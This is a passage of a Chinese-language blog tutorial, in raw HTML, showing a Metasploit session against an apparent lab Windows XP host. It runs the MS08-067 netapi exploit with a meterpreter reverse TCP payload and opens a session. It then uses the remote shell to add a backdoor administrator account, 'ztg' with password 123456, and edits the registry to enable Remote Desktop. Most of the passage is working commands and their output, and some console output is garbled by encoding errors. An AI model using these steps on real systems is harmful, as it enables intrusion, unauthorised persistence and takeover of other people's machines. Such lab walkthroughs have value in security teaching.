            <span class="hljs-params" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">||</span>--<span class="hljs-params" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">||</span> *


       =[ metasploit v4.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">16.6</span>-dev                        ]
+ -- --=[ <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1682</span> exploits - <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">964</span> auxiliary - <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">297</span> post      ]
+ -- --=[ <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">498</span> payloads - <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">40</span> encoders - <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">10</span> nops            ]
+ -- --=[ Free Metasploit Pro <span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">trial:</span> <span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">http:</span>/<span class="hljs-regexp" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">/r-7.co/trymsp</span> ]
</code></pre><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>使用help命令查看其参数和用法</strong></p></blockquote><pre class="hljs ruby" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="ruby hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">msf &gt; help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner      Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get         Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    irb         Drop into irb scripting mode
    load          Load a framework plugin
    quit          Exit the console
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">and</span> display information about sessions
    set         Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">for</span> the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">and</span> manipulate background threads
    unload      Unload a framework plugin
    unset         Unsets one <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> more context-specific variables
    unsetg      Unsets one <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> more global variables
    version       Show the framework <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">and</span> console library version numbers


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">for</span> one <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> more modules
    back          Move back from the current context
    edit          Edit the current <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">with</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">the</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">preferred</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">editor</span></span>
    info          Displays information about one <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> more modules
    loadpath      Searches <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">for</span> <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">and</span> loads modules from a path
    options       Displays global options <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">for</span> one <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> more modules
    popm          Pops the latest <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">off</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">the</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">stack</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">and</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">makes</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">it</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">active</span></span>
    previous      Sets the previously loaded <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">as</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">the</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">current</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">module</span></span>
    pushm         Pushes the active <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> list of modules onto the <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">stack</span></span>
    reload_all    Reloads all modules from all <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">defined</span> <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">paths</span></span>
    search      Searches <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">names</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">and</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">descriptions</span></span>
    show          Displays modules of a given type, <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">or</span> all modules
    use         Selects a <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">by</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">name</span></span>


Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">and</span> manages jobs
    kill          Kill a job
    rename_job    Rename a job


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc      Save commands entered since start to a file
    resource      Run the commands stored <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">in</span> a file


Database Backend Commands
=========================

    Command         Description
    -------         -----------
    db_connect      Connect to an existing database
    db_disconnect   Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap         Executes nmap <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">and</span> records the output automatically
    db_rebuild_cacheRebuilds the database-stored <span class="hljs-class" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;"><span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">module</span> <span class="hljs-title" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">cache</span></span>
    db_status         Show the current database status
    hosts             List all hosts <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">in</span> the database
    loot            List all loot <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">in</span> the database
    notes             List all notes <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">in</span> the database
    services          List all services <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">in</span> the database
    vulns             List all vulnerabilities <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">in</span> the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">in</span> the database

</code></pre><p style="margin: 10px auto; text-align: justify;"><strong>5.0 运行search netapi命令搜索netapi,在metasploip框架中列出所有与netapi相关的漏洞利用代码</strong></p><pre class="hljs javascript" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="javascript hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">msf &gt; searchnetapi

Matching Modules
================

   Name                                 Disclosure <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Date</span>Rank    Description
   ----                                 -------------------    -----------
   exploit/windows/smb/ms03_049_netapi<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2003</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">11</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">11</span>       good    MS03-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>49 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms06_040_netapi<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2006</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>8-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>8       good    MS06-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>40 Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_070_wkssvc<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2006</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">11</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">14</span>       manualMS06-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>70 Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms08_067_netapi<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2008</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">10</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">28</span>       great   MS08-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>67 Microsoft Server Service Relative Path Stack Corruption

</code></pre><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>可以看到最后一个漏洞利用代码的评级为great,所以优先使用ms08_067_netapi。</strong><br><strong>show tagrgets可以查看攻击平台</strong><br><strong>show opinions可以查看攻击需要设置那些参数</strong><br><strong>show payloads可以查看使用的攻击载荷</strong></p></blockquote><p style="margin: 10px auto; text-align: justify;"><strong>6.0使用 use exploit/windows/smb/ms08_067_netapi ,设置参数</strong></p><pre class="hljs bash" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="bash hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">msf &gt; use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) &gt; <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> rhost 192.168.201.135
rhost =&gt; 192.168.201.135
msf exploit(ms08_067_netapi) &gt; check
[+] 192.168.201.135:445 The target is vulnerable.
msf exploit(ms08_067_netapi) &gt; <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> lhost 192.168.201.133
lhost =&gt; 192.168.201.133
msf exploit(ms08_067_netapi) &gt; <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> target 34
msf exploit(ms08_067_netapi) &gt; <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">set</span> payload windows/meterpreter/reverse_tcp_allports
payload =&gt; windows/meterpreter/reverse_tcp_allports

msf exploit(ms08_067_netapi) &gt; exploit
[*] Started reverse TCP handler on 192.168.201.133:1
[*] 192.168.201.135:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 192.168.201.135
[*] Meterpreter session 1 opened (192.168.201.133:1 -&gt; 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800

</code></pre><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>set rhost是设置目标主机ip</strong><br><strong>setset lhost设置本机ip</strong><br><strong>set payload设置攻击载荷</strong><br><strong>exploit,是实行攻击,如果成功,会得到一个session,可以使用meterpreter模板进一步提取</strong></p></blockquote><p style="margin: 10px auto; text-align: justify;"><strong>7.0 输入shell,获取受控zhuji的shel,我这里是windows的dos。</strong></p><pre class="hljs ruby" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="ruby hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">meterpreter &gt; shell
Process <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1968</span> created.
Channel <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span> created.
Microsoft Windows XP [锟芥本 <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">5.1</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2600</span>]
(C) 锟斤拷权锟斤拷锟斤拷 <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1985</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2001</span> Microsoft Corp.

<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">C:</span>\WINDOWS\system32&gt;net user ztg <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">123456</span> /add
net user ztg <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">123456</span> /add
锟绞伙拷锟窖撅拷锟斤拷锟节★拷

锟斤拷锟斤拷锟斤拷 NET HELPMSG <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">2224</span> 锟皆伙拷锟矫革拷锟斤拷锟侥帮拷锟斤拷锟斤拷


<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">C:</span>\WINDOWS\system32&gt;net localgroup administrators ztg /add
net localgroup administrators ztg /add
锟斤拷锟斤拷系统锟斤拷锟斤拷 <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1378</span>锟斤拷

锟斤拷锟斤拷锟绞伙拷锟斤拷锟斤拷锟角憋拷锟斤拷锟斤拷锟侥筹拷员锟斤拷


<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">C:</span>\WINDOWS\system32&gt;REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal<span class="hljs-string" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">" "</span>Server /v fDenyTSConnections /t REG_DWORD /d <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span> /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal<span class="hljs-string" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">" "</span>Server /v fDenyTSConnections /t REG_DWORD /d <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span> /f

锟斤拷锟斤拷锟缴癸拷锟斤拷锟斤拷

<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">C:</span>\WINDOWS\system32&gt;netstat -an
netstat -an

Active Connections

ProtoLocal Address          Foreign Address      State
TCP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">135</span>            <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>            LISTENING
TCP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">445</span>            <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>            LISTENING
TCP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">3389</span>         <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>            LISTENING
